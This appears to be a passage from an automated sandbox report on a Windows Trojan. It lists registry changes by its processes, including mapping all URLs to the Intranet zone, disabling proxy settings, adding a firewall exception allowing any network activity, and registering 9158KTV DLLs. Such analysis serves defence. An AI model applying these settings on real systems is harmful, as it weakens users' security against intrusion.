[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process xianfengkunbang.exe:1324 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "72 40 C0 11 D4 F1 F7 8B 5A 07 29 45 1C B6 47 3C"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Browser]
"ieversion" = "6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process MM-liao8863.exe:2808 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"Name" = "MM-liao8863.exe"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKLM\SOFTWARE\QuanQuan]
"LastTime" = "Type: REG_QWORD, Length: 8"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1C 00 00 00 01 00 00 00 00 00 00 00"
[HKLM\SOFTWARE\Microsoft\DirectDraw\MostRecentApplication]
"ID" = "1437574637"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "8C 2E F4 CB F3 7C 8A 2B C9 CF 9B 62 83 0D C7 05"
[HKLM\SOFTWARE\QuanQuan]
"RunCount" = "1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Program Files%\9158ktv\DownLoad]
"9158chat2_ktv088_63.exe" = "9158chat2_ktv088_63"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
Proxy settings are disabled:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"
The Trojan deletes the following value(s) in system registry:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"
The process BaiduP2PService.exe:252 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "AB FA 69 4C C0 C7 50 A1 D7 27 0F B2 91 8C 1E AA"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}]
"AppName" = "BaiduP2PService.exe"
"Policy" = "3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{2175ADB5-255E-4f1b-A091-EA0BE135D9E0}]
"AppPath" = "%Program Files%\tools"
The process BaiduP2PService.exe:472 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download]
"QQPCDownload71960.exe" = "QQPCDownload71960"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
"Desktop" = "%Documents and Settings%\%current user%\Desktop"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download]
"MM-liao8863.exe" = "DownloadInstall Microsoft 基础类åºâ€Ã§â€Â¨Ã§Â¨â€¹Ã¥ÂºÂ"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download]
"install1393485.exe" = "install1393485"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "EB 86 7E 81 D2 97 6E 60 45 C3 D1 35 EA 7E 52 3D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"
The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:
[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"
The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:
"ProxyBypass" = "1"
The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:
"IntranetName" = "1"
The process xianfeng.exe:272 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A 11 AE 1D 91 1E 2A 9D 7D DA 54 76 F9 70 26 CE"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Browser]
"ieversion" = "6"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"
The process RsMgrSvc.exe:1936 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "81 53 FB AD 0B 3C D3 55 0E E3 15 E6 AA 3D ED 0A"
The process QQPCDownload71960.exe:2776 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "7D D8 20 E4 30 8C 29 EA ED 91 01 ED 69 00 98 F0"
Adds a rule to the firewall Windows which allows any network activity:
[HKLM\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\AuthorizedApplications\List\%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download]
"QQPCDownload71960.exe" = "%Documents and Settings%\All Users\Application Data\Baidu\BaiduPlayer\download\QQPCDownload71960.exe:*:Enabled:Tencent Download Program"
The process regsvr32.exe:2380 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "21 6F 6F 82 35 2B E6 B4 42 4C C9 1E F6 D5 B3 F6"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"
[HKCR\Invoker9158.InvokeChat]
"(Default)" = "InvokeChat Class"
[HKCR\Invoker9158.InvokeChat.1]
"(Default)" = "InvokeChat Class"
[HKCR\Invoker9158.InvokeChat\CurVer]
"(Default)" = "Invoker9158.InvokeChat.1"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"Version" = "1.0"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\VersionIndependentProgID]
"(Default)" = "Invoker9158.InvokeChat"
[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0]
"(Default)" = "Invoker9158 1.0 Type Library"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"
[HKCR\TypeLib\{9D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\Invoker9158.InvokeChat.1\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\ProgID]
"(Default)" = "Invoker9158.InvokeChat.1"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}]
"(Default)" = "InvokeChat Class"
[HKCR\CLSID\{3D0F9B9E-3987-4261-88A6-382B210CC484}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\Invoker9158.dll"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}]
"(Default)" = "IInvokeChat"
[HKCR\Interface\{2967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Invoker9158.InvokeChat\CLSID]
"(Default)" = "{3D0F9B9E-3987-4261-88A6-382B210CC484}"
The process regsvr32.exe:2448 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "1C 27 00 09 3B BD 71 E4 0F BB D9 70 13 B6 83 45"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\WebVideo.dll"
"ThreadingModel" = "Apartment"
[HKCR\WebVideo.ExeClient]
"(Default)" = "ExeClient Class"
[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0]
"(Default)" = "WebVideo 1.0 Type Library"
[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\WebVideo.ExeClient.1]
"(Default)" = "ExeClient Class"
[HKCR\WebVideo.ExeClient\CurVer]
"(Default)" = "WebVideo.ExeClient.1"
[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}]
"(Default)" = "ExeClient Class"
[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}]
"(Default)" = "IExeClient"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\VersionIndependentProgID]
"(Default)" = "WebVideo.ExeClient"
[HKCR\WebVideo.ExeClient\CLSID]
"(Default)" = "{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}"
[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\TypeLib]
"Version" = "1.0"
"(Default)" = "{16FD93FF-DAB2-4658-B17B-F714A86D942F}"
[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\WebVideo.ExeClient.1\CLSID]
"(Default)" = "{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\ProgID]
"(Default)" = "WebVideo.ExeClient.1"
[HKCR\Interface\{EC598E09-8FAE-497C-9351-087B4B0B757B}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{A6F9255E-2D18-43FA-88EF-86FFF0D57D9B}\TypeLib]
"(Default)" = "{16FD93FF-DAB2-4658-B17B-F714A86D942F}"
[HKCR\TypeLib\{16FD93FF-DAB2-4658-B17B-F714A86D942F}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\WebVideo.dll"
The process regsvr32.exe:2328 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\ImageOle.GifAnimator.1]
"(Default)" = "GifAnimator Class"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\Version]
"(Default)" = "1.0"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\VersionIndependentProgID]
"(Default)" = "ImageOle.GifAnimator"
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\TypeLib]
"(Default)" = "{710993A2-4F87-41D7-B6FE-F5A20368465F}"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ToolboxBitmap32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll, 102"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"
[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\FLAGS]
"(Default)" = "0"
[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0]
"(Default)" = "ImageOle 1.0 Type Library"
[HKCR\ImageOle.GifAnimator\CurVer]
"(Default)" = "ImageOle.GifAnimator.1"
[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\TypeLib]
"Version" = "1.0"
[HKCR\ImageOle.GifAnimator]
"(Default)" = "GifAnimator Class"
[HKCR\ImageOle.GifAnimator\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}]
"(Default)" = "IGifAnimator"
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "09 47 06 DB 24 F6 FB 0E AB 15 D2 57 42 3D E2 D3"
[HKCR\ImageOle.GifAnimator.1\CLSID]
"(Default)" = "{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}"
[HKCR\Interface\{0C1CF2DF-05A3-4FEF-8CD4-F5CFC4355A16}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\TypeLib\{710993A2-4F87-41D7-B6FE-F5A20368465F}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\ImageOle.dll"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}\ProgID]
"(Default)" = "ImageOle.GifAnimator.1"
[HKCR\CLSID\{06ADA938-0FB0-4BC0-B19B-0A38AB17F182}]
"(Default)" = "GifAnimator Class"
The process regsvr32.exe:2480 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "82 F0 F9 DF 51 78 58 28 95 D9 6D 0E 0B C2 39 DE"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"ThreadingModel" = "Apartment"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"(Default)" = "{1D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\0\win32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"
[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\HELPDIR]
"(Default)" = "d:\Program Files\9158KTV\"
[HKCR\Login9158.Fun.1\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}]
"(Default)" = "Fun Class"
[HKCR\Login9158.Fun]
"(Default)" = "Fun Class"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\InprocServer32]
"(Default)" = "d:\Program Files\9158KTV\login9158.dll"
[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0]
"(Default)" = "Login9158 1.0 Type Library"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\TypeLib]
"(Default)" = "{9D71FFCB-5418-4344-BC2C-A87D735E05B7}"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\ProgID]
"(Default)" = "Login9158.Fun.1"
[HKCR\CLSID\{6C029846-C8D3-440A-B9B6-9CF9A73678E2}\VersionIndependentProgID]
"(Default)" = "Login9158.Fun"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\ProxyStubClsid32]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"
[HKCR\Login9158.Fun\CLSID]
"(Default)" = "{6C029846-C8D3-440A-B9B6-9CF9A73678E2}"
[HKCR\Login9158.Fun\CurVer]
"(Default)" = "Login9158.Fun.1"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}\TypeLib]
"Version" = "1.0"
[HKCR\Interface\{1967511D-5AED-4479-906D-FEBE89CA00E9}]
"(Default)" = "IFun"
[HKCR\Login9158.Fun.1]
"(Default)" = "Fun Class"
[HKCR\TypeLib\{1D71FFCB-5418-4344-BC2C-A87D735E05B7}\1.0\FLAGS]
"(Default)" = "0"
The process install1393485.exe:1148 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:
[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcDll" = "1478494857"
[HKLM\SOFTWARE\rising\RAV]
"Name" = "Rising AntiVirus 2012"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"rstrayexe" = "gWx0Lv5HQEgHSwg0HF4LXHw="
"RAV" = "gWx0Lv5HYHol0A=="
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"InstallLocation" = "%Program Files%\Rising\RSD"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"InstallPath" = "gWx0Lv5HF2shdi4fc3Y3cDtobmkaSgAjVWcheD8D"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\RSD]
"DisplayVersion" = "23.00.01.03"
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"
[HKLM\SOFTWARE\rising\RAV\cfgUn\PreventUninstallSwitch]
"PreventUninstallSwitch" = "1"
[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcKind" = "5"
[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"
[HKCR\CLSID\{F1CF8F61-AB1D-11d4-ABBD-0050BACEC828}\RzNBMlVLLUswUDBORC1MMEVGU1UtRkg1MzAw]
"ProcInfo" = "1446872457"
[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"
[HKCR\CLSID\{AC3909C5-DC79-47e5-86CA-7FB5C041A37C}]
"Title" = "gWx0Lv5H-suj/tn/-pC71NWzoQ=="
[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"
